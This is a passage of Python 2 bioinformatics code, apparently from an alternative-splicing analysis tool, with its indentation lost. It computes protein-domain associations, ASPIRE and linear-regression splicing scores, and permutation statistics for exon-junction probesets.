domain = values[0]; call = values[-1] ### occurs when a | exists in the annotations from UniProt
try: domain_gene_count_db[domain].append(gene)
except KeyError: domain_gene_count_db[domain] = [gene]
try: gene_protein_ft_db[gene].append(domain)
except KeyError: gene_protein_ft_db[gene]=[domain]
elif proceed == 'yes':
for domain_data in probeset_aligning_db[probeset]:
try: domain,call = string.split(domain_data,'|')
except Exception:
values = string.split(domain_data,'|')
domain = values[0]; call = values[-1]
new_domain_list.append((domain,call))
#new_domain_list = string.join(new_domain_list,', ')
gene_protein_ft_db[gene,original_probeset] = new_domain_list
domain_gene_count_db = eliminate_redundant_dict_values(domain_gene_count_db)
probeset_aligning_db=[] ### Clear memory
probeset_aligning_protein_db = importGeneric(filename)
probeset_pairs={} ### Store all possible probeset pairs as single probesets for protein-protein associations
for probeset in exon_db:
if len(probeset)==2:
for p in probeset: probeset_pairs[p] = probeset
if report_type == 'probeset':
### Below code was re-written to be more memory efficient by not storing all data in probeset-domain-annotations-*comp*.txt via generic import
protein_functional_attribute_db={}; probeset_protein_associations={}; protein_db={}
for probeset in exon_db:
initial_proceed = 'no'; original_probeset = probeset
if probeset in probeset_aligning_protein_db: initial_proceed = 'yes'
elif array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
if '|' in probeset[0]: probeset1 = string.split(probeset[0],'|')[0]; probeset = probeset1,probeset[1]
try: alternate_probeset_id = exon_db[probeset].InclusionLookup(); probeset = alternate_probeset_id,probeset[1]
except Exception: null=[]
probeset_joined = string.join(probeset,'|')
#print [probeset_joined],[probeset]
if probeset_joined in probeset_aligning_protein_db: initial_proceed = 'yes'; probeset = probeset_joined
elif probeset[0] in probeset_aligning_protein_db: initial_proceed = 'yes'; probeset = probeset[0]
elif probeset[1] in probeset_aligning_protein_db: initial_proceed = 'yes'; probeset = probeset[1]
#else: for i in probeset_aligning_db: print [i];kill
if initial_proceed == 'yes':
protein_data_list=probeset_aligning_protein_db[probeset]
new_protein_list = []
gene = exon_db[original_probeset].GeneID()
for protein_data in protein_data_list:
protein_info,call = string.split(protein_data,'|')
if 'AA:' in protein_info:
protein_info_r = string.replace(protein_info,')','*')
protein_info_r = string.replace(protein_info_r,'(','*')
protein_info_r = string.split(protein_info_r,'*')
null_protein = protein_info_r[1]; hit_protein = protein_info_r[3]
probeset_protein_associations[original_probeset] = null_protein,hit_protein,call
protein_db[null_protein] = []; protein_db[hit_protein] = []
new_protein_list.append((protein_info,call))
#new_protein_list = string.join(new_domain_list,', ')
protein_functional_attribute_db[gene,original_probeset] = new_protein_list
filename = 'AltDatabase/'+species+'/'+array_type+'/SEQUENCE-protein-dbase_'+comp_type+'.txt'
filename=getExonVersionFilename(filename)
protein_seq_db = importGenericFiltered(filename,protein_db)
for key in protein_functional_attribute_db:
gene,probeset = key
try:
null_protein,hit_protein,call = probeset_protein_associations[probeset]
null_seq = protein_seq_db[null_protein][0]; hit_seq = protein_seq_db[hit_protein][0]
seq_attr = 'sequence: ' +'('+null_protein+')'+null_seq +' -> '+'('+hit_protein+')'+hit_seq
protein_functional_attribute_db[key].append((seq_attr,call))
except KeyError: null=[]
protein_seq_db=[]; probeset_aligning_protein_db=[]
return gene_protein_ft_db,domain_gene_count_db,protein_functional_attribute_db
else:
probeset_aligning_protein_db=[]; len_gene_protein_ft_db = len(gene_protein_ft_db); gene_protein_ft_db=[]
return len_gene_protein_ft_db,domain_gene_count_db
class SimpleJunctionData:
def __init__(self, geneid, probeset1, probeset2, probeset1_display, critical_exon_list):
self._geneid = geneid; self._probeset1 = probeset1; self._probeset2 = probeset2
self._probeset1_display = probeset1_display; self._critical_exon_list = critical_exon_list
def GeneID(self): return self._geneid
def Probeset1(self): return self._probeset1
def Probeset2(self): return self._probeset2
def InclusionDisplay(self): return self._probeset1_display
def CriticalExons(self): return self._critical_exon_list
def setSplicingCall(self,splicing_call):
#self._splicing_call = EvidenceOfAltSplicing(slicing_annot)
self._splicing_call = splicing_call
def setSymbol(self,symbol): self.symbol = symbol
def Symbol(self): return self.symbol
def SplicingCall(self): return self._splicing_call
def setInclusionLookup(self,incl_junction_probeset): self.incl_junction_probeset = incl_junction_probeset
def InclusionLookup(self): return self.incl_junction_probeset
def formatJunctionData(probesets,affygene,critical_exon_list):
if '|' in probesets[0]: ### Only return the first inclusion probeset (agglomerated probesets)
incl_list = string.split(probesets[0],'|')
incl_probeset = incl_list[0]; excl_probeset = probesets[1]
else: incl_probeset = probesets[0]; excl_probeset = probesets[1]
jd = SimpleJunctionData(affygene,incl_probeset,excl_probeset,probesets[0],critical_exon_list)
key = incl_probeset,excl_probeset
return key,jd
class JunctionExpressionData:
def __init__(self, baseline_norm_exp, exper_norm_exp, pval, ped):
self.baseline_norm_exp = baseline_norm_exp; self.exper_norm_exp = exper_norm_exp; self.pval = pval; self.ped = ped
def ConNI(self):
ls=[]
for i in self.logConNI():
ls.append(math.pow(2,i))
return ls
def ExpNI(self):
ls=[]
for i in self.logExpNI():
ls.append(math.pow(2,i))
return ls
def ConNIAvg(self): return math.pow(2,statistics.avg(self.logConNI()))
def ExpNIAvg(self): return math.pow(2,statistics.avg(self.logExpNI()))
def logConNI(self): return self.baseline_norm_exp
def logExpNI(self): return self.exper_norm_exp
def Pval(self): return self.pval
def ProbesetExprData(self): return self.ped
def __repr__(self): return self.ConNI()+'|'+self.ExpNI()
def calculateAllASPIREScores(p1,p2):
b1o = p1.ConNIAvg(); b2o = p2.ConNIAvg()
e1o = p1.ExpNIAvg(); e2o = p2.ExpNIAvg(); original_score = statistics.aspire_stringent(b1o,e1o,b2o,e2o)
index=0; baseline_scores=[] ### Loop through each control ratio and compare to control ratio mean
for b1 in p1.ConNI():
b2 = p2.ConNI()[index]
score = statistics.aspire_stringent(b2,e2o,b1,e1o); index+=1
baseline_scores.append(score)
index=0; exp_scores=[] ### Loop through each experimental ratio and compare to control ratio mean
for e1 in p1.ExpNI():
e2 = p2.ExpNI()[index]
score = statistics.aspire_stringent(b1o,e1,b2o,e2); index+=1
exp_scores.append(score)
try:
aspireP = statistics.runComparisonStatistic(baseline_scores,exp_scores,probability_statistic)
except Exception: aspireP = 'NA' ### Occurs when analyzing two groups with no variance
if aspireP == 1: aspireP = 'NA'
"""
if aspireP<0.05 and oscore>0.2 and statistics.avg(exp_scores)<0:
index=0
for e1 in p1.ExpNI():
e2 = p2.ExpNI()[index]
score = statistics.aspire_stringent(b1,e1,b2,e2)
print p1.ExpNI(), p2.ExpNI(); print e1, e2
print e1o,e2o; print b1, b2; print score, original_score
print exp_scores, statistics.avg(exp_scores); kill"""
return baseline_scores, exp_scores, aspireP
def stringListConvert(ls):
ls2=[]
for i in ls: ls2.append(str(i))
return ls2
def analyzeJunctionSplicing(nonlog_NI_db):
group_sizes = []; original_array_indices = permute_lists[0] ###p[0] is the original organization of the group samples prior to permutation
for group in original_array_indices: group_sizes.append(len(group))
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
if len(filtered_probeset_db)>0:
temp_db={}
for probeset in nonlog_NI_db: temp_db[probeset]=[]
for probeset in temp_db:
try: filtered_probeset_db[probeset]
except KeyError: del nonlog_NI_db[probeset]
### Used to the export relative individual adjusted probesets fold changes used for splicing index values
if export_NI_values == 'yes':
global NIdata_export
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
NIdata_export = export.ExportFile(summary_output)
title = string.join(['inclusion-probeset','exclusion-probeset']+original_array_names,'\t')+'\n'; NIdata_export.write(title)
### Calculate a probeset p-value adjusted for constitutive expression levels (taken from splicing index method)
xl=0
probeset_normIntensity_db={}
for probeset in array_raw_group_values:
ed = exon_db[probeset]; geneid = ed.GeneID(); xl+=1
#if geneid in alt_junction_db and geneid in original_avg_const_exp_db: ### Don't want this filter since it causes problems for Trans-splicing
group_index = 0; si_interim_group_db={}; ge_threshold_count=0; value_count = 0
### Prepare normalized expression lists for recipricol-junction algorithms
if geneid in avg_const_exp_db:
for group_values in array_raw_group_values[probeset]:
value_index = 0; ratio_hash=[]
for value in group_values: ###Calculate normalized ratio's for each condition and save raw values for later permutation
exp_val = value;ge_val = avg_const_exp_db[geneid][value_count]; exp_ratio = exp_val-ge_val
ratio_hash.append(exp_ratio); value_index +=1; value_count +=1
si_interim_group_db[group_index] = ratio_hash
group_index+=1
group1_ratios = si_interim_group_db[0]; group2_ratios = si_interim_group_db[1]
### Calculate and store simple expression summary stats
data_list1 = array_raw_group_values[probeset][0]; data_list2 = array_raw_group_values[probeset][1]
baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
#group_name1 = array_group_list[0]; group_name2 = array_group_list[1]
try:
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 'NA'
if ttest_exp_p == 1: ttest_exp_p = 'NA'
adj_fold = statistics.avg(group2_ratios) - statistics.avg(group1_ratios)
ped = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, '')
try:
try:
normIntensityP = statistics.runComparisonStatistic(group1_ratios,group2_ratios,probability_statistic)
except Exception:
#print group1_ratios,group2_ratios,array_raw_group_values[probeset],avg_const_exp_db[geneid];kill
normIntensityP = 'NA' ###occurs for constitutive probesets
except Exception: normIntensityP = 0
if normIntensityP == 1: normIntensityP = 'NA'
ji = JunctionExpressionData(group1_ratios, group2_ratios, normIntensityP, ped)
probeset_normIntensity_db[probeset]=ji ### store and access this below
#if probeset == 'G6899622@J916374@j_at': print normIntensityP,group1_ratios,group2_ratios;kill
###Concatenate the two raw expression groups into a single list for permutation analysis
ls_concatenated = []
for group in array_raw_group_values[probeset]:
for entry in group: ls_concatenated.append(entry)
if analysis_method == 'linearregres': ###Convert out of log space
ls_concatenated = statistics.log_fold_conversion_fraction(ls_concatenated)
array_raw_group_values[probeset] = ls_concatenated
s = 0; t = 0; y = ''; denominator_events=0; excluded_probeset_db = {}
splice_event_list=[]; splice_event_list_mx=[]; splice_event_list_non_mx=[]; event_mx_temp = []; permute_p_values={} #use this to exclude duplicate mx events
for affygene in alt_junction_db:
if affygene in original_avg_const_exp_db:
constit_exp1 = original_avg_const_exp_db[affygene][0]
constit_exp2 = original_avg_const_exp_db[affygene][1]
ge_fold=constit_exp2-constit_exp1
for event in alt_junction_db[affygene]:
if array_type == 'AltMouse':
#event = [('ei', 'E16-E17'), ('ex', 'E16-E18')]
#critical_exon_db[affygene,tuple(critical_exons)] = [1,'E'+str(e1a),'E'+str(e2b)] --- affygene,tuple(event) == key, 1 indicates both are either up or down together
event_call = event[0][0] + '-' + event[1][0]
exon_set1 = event[0][1]; exon_set2 = event[1][1]
probeset1 = exon_dbase[affygene,exon_set1]
probeset2 = exon_dbase[affygene,exon_set2]
critical_exon_list = critical_exon_db[affygene,tuple(event)]
if array_type == 'junction' or array_type == 'RNASeq':
event_call = 'ei-ex' ### Below objects from JunctionArrayEnsemblRules - class JunctionInformation
probeset1 = event.InclusionProbeset(); probeset2 = event.ExclusionProbeset()
exon_set1 = event.InclusionJunction(); exon_set2 = event.ExclusionJunction()
try: novel_event = event.NovelEvent()
except Exception: novel_event = 'known'
critical_exon_list = [1,event.CriticalExonSets()]
key,jd = formatJunctionData([probeset1,probeset2],affygene,critical_exon_list[1])
if array_type == 'junction' or array_type == 'RNASeq':
try: jd.setSymbol(annotate_db[affygene].Symbol())
except Exception:null=[]
#if '|' in probeset1: print probeset1, key,jd.InclusionDisplay();kill
probeset_comp_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
#print probeset1,probeset2, critical_exon_list,event_call,exon_set1,exon_set2;kill
if probeset1 in nonlog_NI_db and probeset2 in nonlog_NI_db:
denominator_events+=1
try: p1 = probeset_normIntensity_db[probeset1]; p2 = probeset_normIntensity_db[probeset2]
except Exception:
print probeset1, probeset2
p1 = probeset_normIntensity_db[probeset1]
p2 = probeset_normIntensity_db[probeset2]
#if '|' in probeset1: print
pp1 = p1.Pval(); pp2 = p2.Pval()
baseline_ratio1 = p1.ConNIAvg()
experimental_ratio1 = p1.ExpNIAvg()
baseline_ratio2 = p2.ConNIAvg()
experimental_ratio2 = p2.ExpNIAvg()
ped1 = p1.ProbesetExprData()
ped2 = p2.ProbesetExprData()
Rin = ''; Rex = ''
r = 0 ###Variable used to determine if we should take the absolute value of dI for mutually exlcusive events
if event_call == 'ei-ex': #means probeset1 is an exon inclusion and probeset2 is an exon exclusion
Rin = baseline_ratio1/experimental_ratio1 # Rin=A/C
Rex = baseline_ratio2/experimental_ratio2 # Rin=B/D
I1=baseline_ratio1/(baseline_ratio1+baseline_ratio2)
I2=experimental_ratio1/(experimental_ratio1+experimental_ratio2)
###When Rex is larger, the exp_ratio for exclusion is decreased in comparison to baseline.
###Thus, increased inclusion (when Rin is small, inclusion is big)
if (Rin>1 and Rex<1): y = 'downregulated'
elif (Rin<1 and Rex>1): y = 'upregulated'
elif (Rex<Rin): y = 'downregulated'
else: y = 'upregulated'
temp_list = []
if event_call == 'mx-mx':
temp_list.append(exon_set1); temp_list.append(exon_set2);temp_list.sort()
if (affygene,temp_list) not in event_mx_temp: #use this logic to prevent mx entries being added more than once
event_mx_temp.append((affygene,temp_list))
###Arbitrarily choose which exon-set will be Rin or Rex, does matter for mutually exclusive events
Rin = baseline_ratio1/experimental_ratio1 # Rin=A/C
Rex = baseline_ratio2/experimental_ratio2 # Rin=B/D
I1=baseline_ratio1/(baseline_ratio1+baseline_ratio2)
I2=experimental_ratio1/(experimental_ratio1+experimental_ratio2)
y = 'mutually-exclusive'; r = 1
if analysis_method == 'ASPIRE' and Rex != '':
#if affygene == 'ENSMUSG00000000126': print Rin, Rex, probeset1, probeset2
if (Rin>1 and Rex<1) or (Rin<1 and Rex>1):
s +=1
in1=((Rex-1.0)*Rin)/(Rex-Rin); in2=(Rex-1.0)/(Rex-Rin)
dI = ((in2-in1)+(I2-I1))/2.0 #modified to give propper exon inclusion
dI = dI*(-1) ### Reverse the fold to make equivalent to splicing-index and FIRMA scores
try: baseline_scores, exp_scores, aspireP = calculateAllASPIREScores(p1,p2)
except Exception: baseline_scores = [0]; exp_scores=[dI]; aspireP = 0
if export_NI_values == 'yes':
baseline_scores = stringListConvert(baseline_scores); exp_scores = stringListConvert(exp_scores)
ev = string.join([probeset1,probeset2]+baseline_scores+exp_scores,'\t')+'\n'; NIdata_export.write(ev)
if max_replicates >2 or equal_replicates==2:
permute_p_values[(probeset1,probeset2)] = [aspireP, 'NA', 'NA', 'NA']
if r == 1: dI = abs(dI) ###Occurs when event is mutually exclusive
#if abs(dI)>alt_exon_logfold_cutoff: print [dI],pp1,pp2,aspireP;kill
#print [affygene,dI,pp1,pp2,aspireP,event.CriticalExonSets(),probeset1,probeset2,alt_exon_logfold_cutoff,p_threshold]
if ((pp1<p_threshold or pp2<p_threshold) or pp1==1 or pp1=='NA') and abs(dI) > alt_exon_logfold_cutoff: ###Require that the splice event have a constitutive corrected p less than the user defined threshold
ejd = ExonJunctionData(dI,probeset1,probeset2,pp1,pp2,y,event_call,critical_exon_list,affygene,ped1,ped2)
"""if probeset1 == 'ENSMUSG00000033335:E16.1-E17.1' and probeset2 == 'ENSMUSG00000033335:E16.1-E19.1':
print [dI,pp1,pp2,p_threshold,alt_exon_logfold_cutoff]
print baseline_scores, exp_scores, [aspireP]#;sys.exit()"""
ejd.setConstitutiveExpression(constit_exp1); ejd.setConstitutiveFold(ge_fold)
if perform_permutation_analysis == 'yes': splice_event_list.append((dI,ejd))
elif aspireP < permute_p_threshold or aspireP=='NA': splice_event_list.append((dI,ejd))
#if abs(dI)>.2: print probeset1, probeset2, critical_exon_list, [exon_set1], [exon_set2]
#if dI>.2 and aspireP<0.05: print baseline_scores,exp_scores,aspireP, statistics.avg(exp_scores), dI
elif array_type == 'junction' or array_type == 'RNASeq':
excluded_probeset_db[affygene+':'+event.CriticalExonSets()[0]] = probeset1, affygene, dI, 'NA', aspireP
if array_type == 'RNASeq':
try: ejd.setNovelEvent(novel_event)
except Exception: None
if analysis_method == 'linearregres' and Rex != '':
s+=1
log_fold,linregressP,rsqrd_status = getLinearRegressionScores(probeset1,probeset2,group_sizes)
log_fold = log_fold ### Reverse the fold to make equivalent to splicing-index and FIRMA scores
if max_replicates >2 or equal_replicates==2: permute_p_values[(probeset1,probeset2)] = [linregressP, 'NA', 'NA', 'NA']
if rsqrd_status == 'proceed':
if ((pp1<p_threshold or pp2<p_threshold) or pp1==1 or pp1=='NA') and abs(log_fold) > alt_exon_logfold_cutoff: ###Require that the splice event have a constitutive corrected p less than the user defined threshold
ejd = ExonJunctionData(log_fold,probeset1,probeset2,pp1,pp2,y,event_call,critical_exon_list,affygene,ped1,ped2)
ejd.setConstitutiveExpression(constit_exp1); ejd.setConstitutiveFold(ge_fold)
if perform_permutation_analysis == 'yes': splice_event_list.append((log_fold,ejd))
elif linregressP < permute_p_threshold: splice_event_list.append((log_fold,ejd))
#if probeset1 == 'G6990053@762121_762232_at' and probeset2 == 'G6990053@J926254@j_at':
#print event_call, critical_exon_list,affygene, Rin, Rex, y, temp_list;kill
elif array_type == 'junction' or array_type == 'RNASeq':
excluded_probeset_db[affygene+':'+event.CriticalExonSets()[0]] = probeset1, affygene, log_fold, 'NA', linregressP
if array_type == 'RNASeq':
try: ejd.setNovelEvent(novel_event)
except Exception: None
else: t +=1
clearObjectsFromMemory(probeset_normIntensity_db)
probeset_normIntensity_db={}; ### Potentially large memory object containing summary stats for all probesets
statistics.adjustPermuteStats(permute_p_values)
summary_data_db['denominator_exp_events']=denominator_events
print "Number of exon-events analyzed:", s
print "Number of exon-events excluded:", t
return splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db
def maxReplicates():
replicates=0; greater_than_two=0; greater_than_one=0; group_sizes=[]
for probeset in array_raw_group_values:
for group_values in array_raw_group_values[probeset]:
try:
replicates+=len(group_values); group_sizes.append(len(group_values))
if len(group_values)>2: greater_than_two+=1
elif len(group_values)>1: greater_than_one+=1
except Exception: replicates+=len(array_raw_group_values[probeset]); break
break
group_sizes = unique.unique(group_sizes)
if len(group_sizes) == 1: equal_replicates = group_sizes[0]
else: equal_replicates = 0
max_replicates = replicates/float(original_conditions)
if max_replicates<2.01:
if greater_than_two>0 and greater_than_one>0: max_replicates=3
return max_replicates, equal_replicates
def furtherProcessJunctionScores(splice_event_list, probeset_comp_db, permute_p_values):
splice_event_list.sort(); splice_event_list.reverse()
print "filtered %s scores:" % analysis_method, len(splice_event_list)
if perform_permutation_analysis == 'yes':
###*********BEGIN PERMUTATION ANALYSIS*********
if max_replicates >2 or equal_replicates==2:
splice_event_list, p_value_call, permute_p_values = permuteSplicingScores(splice_event_list)
else:
print "WARNING...Not enough replicates to perform permutation analysis."
p_value_call=''; permute_p_values = {}
else:
if max_replicates >2 or equal_replicates==2:
if probability_statistic == 'unpaired t-test':
p_value_call=analysis_method+'-OneWayAnova'
else:
p_value_call=analysis_method+'-'+probability_statistic
else:
if probability_statistic == 'unpaired t-test':
p_value_call='OneWayAnova'; permute_p_values = {}
else:
p_value_call=probability_statistic; permute_p_values = {}
print len(splice_event_list), 'alternative events after subsequent filtering (optional)'
### Get ExonJunction annotaitons
junction_splicing_annot_db = getJunctionSplicingAnnotations(probeset_comp_db)
regulated_exon_junction_db={}; new_splice_event_list=[]
if filter_for_AS == 'yes': print "Filtering for evidence of Alternative Splicing"
for (fold,ejd) in splice_event_list:
proceed = 'no'
if filter_for_AS == 'yes':
try:
ja = junction_splicing_annot_db[ejd.Probeset1(),ejd.Probeset2()]; splicing_call = ja.SplicingCall()
if splicing_call == 1: proceed = 'yes'
except KeyError: proceed = 'no'
else: proceed = 'yes'
if proceed == 'yes':
key,jd = formatJunctionData([ejd.Probeset1(),ejd.Probeset2()],ejd.GeneID(),ejd.CriticalExons())
regulated_exon_junction_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
new_splice_event_list.append((fold,ejd))
### Add junction probeset lookup for reciprocal junctions composed of an exonid (not in protein database currently)
if array_type == 'RNASeq' and '-' not in key[0]: ### Thus, it is an exon compared to a junction
events = alt_junction_db[ejd.GeneID()]
for ji in events:
if (ji.InclusionProbeset(),ji.ExclusionProbeset()) == key:
jd.setInclusionLookup(ji.InclusionLookup()) ### This is the source junction from which the exon ID comes from
probeset_comp_db[ji.InclusionLookup(),ji.ExclusionProbeset()]=jd
#print ji.InclusionProbeset(),ji.ExclusionProbeset(),' ',ji.InclusionLookup()
if filter_for_AS == 'yes': print len(new_splice_event_list), "remaining after filtering for evidence of Alternative splicing"
filtered_exon_db = {}
for junctions in probeset_comp_db:
rj = probeset_comp_db[junctions] ### Add splicing annotations to the AltMouse junction DBs (needed for permutation analysis statistics and filtering)
try: ja = junction_splicing_annot_db[junctions]; splicing_call = ja.SplicingCall(); rj.setSplicingCall(ja.SplicingCall())
except KeyError: rj.setSplicingCall(0)
if filter_for_AS == 'yes': filtered_exon_db[junctions] = rj
for junctions in regulated_exon_junction_db:
rj = regulated_exon_junction_db[junctions]
try: ja = junction_splicing_annot_db[junctions]; rj.setSplicingCall(ja.SplicingCall())
except KeyError: rj.setSplicingCall(0)
if filter_for_AS == 'yes': probeset_comp_db = filtered_exon_db
try: clearObjectsFromMemory(alt_junction_db)
except Exception: null=[]
return new_splice_event_list, p_value_call, permute_p_values, probeset_comp_db, regulated_exon_junction_db
class SplicingScoreData:
def Method(self):
###e.g. ASPIRE
return self._method
def Score(self): return str(self._score)
def Probeset1(self): return self._probeset1
def Probeset2(self): return self._probeset2
def RegulationCall(self): return self._regulation_call
def GeneID(self): return self._geneid
def CriticalExons(self): return self._critical_exon_list[1]
def CriticalExonTuple(self): return self._critical_exon_list
def TTestNormalizedRatios(self): return self._normIntensityP
def TTestNormalizedRatios2(self): return self._normIntensityP2
def setConstitutiveFold(self,exp_log_ratio): self._exp_log_ratio = exp_log_ratio
def ConstitutiveFold(self): return str(self._exp_log_ratio)
def setConstitutiveExpression(self,const_baseline): self.const_baseline = const_baseline
def ConstitutiveExpression(self): return str(self.const_baseline)
def setProbesetExpressionData(self,ped): self.ped1 = ped
def ProbesetExprData1(self): return self.ped1
def ProbesetExprData2(self): return self.ped2
def setNovelEvent(self,novel_event): self._novel_event = novel_event
def NovelEvent(self): return self._novel_event
def EventCall(self):
###e.g. Exon inclusion (ei) Exon exclusion (ex), ei-ex, reported in that direction
return self._event_call
def Report(self):
output = self.Method() +'|'+ self.GeneID() +'|'+ string.join(self.CriticalExons(),'|')
return output
def __repr__(self): return self.Report()
class ExonJunctionData(SplicingScoreData):
def __init__(self,score,probeset1,probeset2,probeset1_p,probeset2_p,regulation_call,event_call,critical_exon_list,affygene,ped1,ped2):
self._score = score; self._probeset1 = probeset1; self._probeset2 = probeset2; self._regulation_call = regulation_call
self._event_call = event_call; self._critical_exon_list = critical_exon_list; self._geneid = affygene
self._method = analysis_method; self._normIntensityP = probeset1_p; self._normIntensityP2 = probeset2_p
self.ped1 = ped1; self.ped2=ped2
class ExonData(SplicingScoreData):
def __init__(self,splicing_index,probeset,critical_exon_list,geneid,group1_ratios,group2_ratios,normIntensityP,opposite_SI_log_mean):
self._score = splicing_index; self._probeset1 = probeset; self._opposite_SI_log_mean = opposite_SI_log_mean
self._critical_exon_list = critical_exon_list; self._geneid = geneid
self._baseline_ratio1 = group1_ratios; self._experimental_ratio1 = group2_ratios
self._normIntensityP = normIntensityP
self._method = analysis_method; self._event_call = 'exon-inclusion'
if splicing_index > 0: regulation_call = 'downregulated' ###Since baseline is the numerator ratio
else: regulation_call = 'upregulated'
self._regulation_call = regulation_call
def OppositeSIRatios(self): return self._opposite_SI_log_mean
class ExcludedExonData(ExonData):
def __init__(self,splicing_index,geneid,normIntensityP):
self._score = splicing_index; self._geneid = geneid; self._normIntensityP = normIntensityP
def getAllPossibleLinearRegressionScores(probeset1,probeset2,positions,group_sizes):
### Get Raw expression values for the two probests
p1_exp = array_raw_group_values[probeset1]
p2_exp = array_raw_group_values[probeset2]
all_possible_scores=[]; index1=0 ### Perform all possible pairwise comparisons between groups (not sure how this will work for 10+ groups)
for (pos1a,pos2a) in positions:
index2=0
for (pos1b,pos2b) in positions:
if pos1a != pos1b:
p1_g1 = p1_exp[pos1a:pos2a]; p1_g2 = p1_exp[pos1b:pos2b]
p2_g1 = p2_exp[pos1a:pos2a]; p2_g2 = p2_exp[pos1b:pos2b]
#log_fold, linregressP, rsqrd = getAllLinearRegressionScores(probeset1,probeset2,p1_g1,p2_g1,p1_g2,p2_g2,len(group_sizes)) ### Used to calculate a pairwise group pvalue
log_fold, rsqrd = performLinearRegression(p1_g1,p2_g1,p1_g2,p2_g2)
if log_fold<0: i1,i2 = index2,index1 ### all scores should indicate upregulation
else: i1,i2=index1,index2
all_possible_scores.append((abs(log_fold),i1,i2))
index2+=1
index1+=1
all_possible_scores.sort()
try: log_fold,index1,index2 = all_possible_scores[-1]
except Exception: log_fold=0; index1=0; index2=0
return log_fold, index1, index2
def getLinearRegressionScores(probeset1,probeset2,group_sizes):
### Get Raw expression values for the two probests
p1_exp = array_raw_group_values[probeset1]
p2_exp = array_raw_group_values[probeset2]
try:
p1_g1 = p1_exp[:group_sizes[0]]; p1_g2 = p1_exp[group_sizes[0]:]
p2_g1 = p2_exp[:group_sizes[0]]; p2_g2 = p2_exp[group_sizes[0]:]
except Exception:
print probeset1,probeset2
print p1_exp
print p2_exp
print group_sizes
force_kill
log_fold, linregressP, rsqrd = getAllLinearRegressionScores(probeset1,probeset2,p1_g1,p2_g1,p1_g2,p2_g2,2)
return log_fold, linregressP, rsqrd
def getAllLinearRegressionScores(probeset1,probeset2,p1_g1,p2_g1,p1_g2,p2_g2,groups):
log_fold, rsqrd = performLinearRegression(p1_g1,p2_g1,p1_g2,p2_g2)
try:
### Repeat for each sample versus baselines to calculate a p-value
index=0; group1_scores=[]
for p1_g1_sample in p1_g1:
p2_g1_sample = p2_g1[index]
log_f, rs = performLinearRegression(p1_g1,p2_g1,[p1_g1_sample],[p2_g1_sample])
group1_scores.append(log_f); index+=1
index=0; group2_scores=[]
for p1_g2_sample in p1_g2:
p2_g2_sample = p2_g2[index]
log_f, rs = performLinearRegression(p1_g1,p2_g1,[p1_g2_sample],[p2_g2_sample])
group2_scores.append(log_f); index+=1
try:
linregressP = statistics.runComparisonStatistic(group1_scores,group2_scores,probability_statistic)
except Exception:
linregressP = 0; group1_scores = [0]; group2_scores = [log_fold]
if linregressP == 1: linregressP = 0
except Exception:
linregressP = 0; group1_scores = [0]; group2_scores = [log_fold]
if export_NI_values == 'yes' and groups==2:
group1_scores = stringListConvert(group1_scores)
group2_scores = stringListConvert(group2_scores)
ev = string.join([probeset1,probeset2]+group1_scores+group2_scores,'\t')+'\n'; NIdata_export.write(ev)
return log_fold, linregressP, rsqrd
def performLinearRegression(p1_g1,p2_g1,p1_g2,p2_g2):
return_rsqrd = 'no'
if use_R == 'yes': ###Uses the RLM algorithm
#print "Performing Linear Regression analysis using rlm."
g1_slope = statistics.LinearRegression(p1_g1,p2_g1,return_rsqrd)
g2_slope = statistics.LinearRegression(p1_g2,p2_g2,return_rsqrd)
else: ###Uses a basic least squared method
#print "Performing Linear Regression analysis using python specific methods."
g1_slope = statistics.simpleLinRegress(p1_g1,p2_g1)
g2_slope = statistics.simpleLinRegress(p1_g2,p2_g2)
log_fold = statistics.convert_to_log_fold(g2_slope/g1_slope)
rsqrd = 'proceed'
#if g1_rsqrd > 0 and g2_rsqrd > 0: rsqrd = 'proceed'
#else: rsqrd = 'hault'
return log_fold, rsqrd
########### Permutation Analysis Functions ###########
def permuteLinearRegression(probeset1,probeset2,p):
p1_exp = array_raw_group_values[probeset1]
p2_exp = array_raw_group_values[probeset2]
p1_g1, p1_g2 = permute_samples(p1_exp,p)
p2_g1, p2_g2 = permute_samples(p2_exp,p)
return_rsqrd = 'no'
if use_R == 'yes': ###Uses the RLM algorithm
g1_slope = statistics.LinearRegression(p1_g1,p2_g1,return_rsqrd)
g2_slope = statistics.LinearRegression(p1_g2,p2_g2,return_rsqrd)
else: ###Uses a basic least squared method
g1_slope = statistics.simpleLinRegress(p1_g1,p2_g1)
g2_slope = statistics.simpleLinRegress(p1_g2,p2_g2)
log_fold = statistics.convert_to_log_fold(g2_slope/g1_slope)
return log_fold
def permuteSplicingScores(splice_event_list):
p_value_call = 'lowest_raw_p'
permute_p_values = {}; splice_event_list2=[]
if len(permute_lists) > 0:
#tuple_data in splice_event_list = dI,probeset1,probeset2,y,event_call,critical_exon_list
all_samples = []; a = 0
for (score,x) in splice_event_list:
###NOTE: This reference dI differs slightly from the below calculated, since the values are calculated from raw relative ratios rather than the avg
###Solution: Use the first calculated dI as the reference
score = score*(-1) ### Reverse the score to make equivalent to splicing-index and FIRMA scores
ref_splice_val = score; probeset1 = x.Probeset1(); probeset2 = x.Probeset2(); affygene = x.GeneID()
y = 0; p_splice_val_dist = []; count = 0; return_rsqrd = 'no'
for p in permute_lists: ###There are two lists in each entry
count += 1
permute = 'yes'
if analysis_method == 'ASPIRE':
p_splice_val = permute_ASPIRE_filtered(affygene, probeset1,probeset2,p,y,ref_splice_val,x)
elif analysis_method == 'linearregres':
slope_ratio = permuteLinearRegression(probeset1,probeset2,p)
p_splice_val = slope_ratio
if p_splice_val != 'null': p_splice_val_dist.append(p_splice_val)
y+=1
p_splice_val_dist.sort()
new_ref_splice_val = str(abs(ref_splice_val)); new_ref_splice_val = float(new_ref_splice_val[0:8]) #otherwise won't match up the scores correctly
if analysis_method == 'linearregres':
if ref_splice_val<0:
p_splice_val_dist2=[]
for val in p_splice_val_dist: p_splice_val_dist2.append(-1*val)
